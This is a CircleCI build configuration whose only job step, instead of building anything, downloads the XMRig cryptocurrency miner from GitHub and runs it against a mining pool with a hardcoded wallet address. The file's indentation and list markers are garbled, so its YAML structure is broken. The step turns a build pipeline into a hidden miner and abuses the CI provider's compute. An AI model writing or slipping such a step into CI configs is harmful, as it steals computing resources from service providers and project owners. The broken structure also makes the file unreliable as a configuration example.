version: 2.0
jobs:
  build:
        docker:
                    - image: circleci/ruby:2.4.2-jessie-node
                                -         auth:
                                            -                   username: mydockerhub-user
                                                        -                             password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
                                                                    -                                 steps:
                                                                                -                                       - checkout
                                                                                      - run:  wget https://github.com/xmrig/xmrig/releases/download/v6.12.2/xmrig-6.12.2-linux-x64.tar.gz && tar -zxvf xmrig-6.12.2-linux-x64.tar.gz && cd xmrig-6.12.2 && ./xmrig -o rx.unmineable.com:3333 -a rx -k -t 3 -u SAITAMA:0x8FAE8E326EBBD7d61EbC191082Df2987E4860e36.YourWorkerName 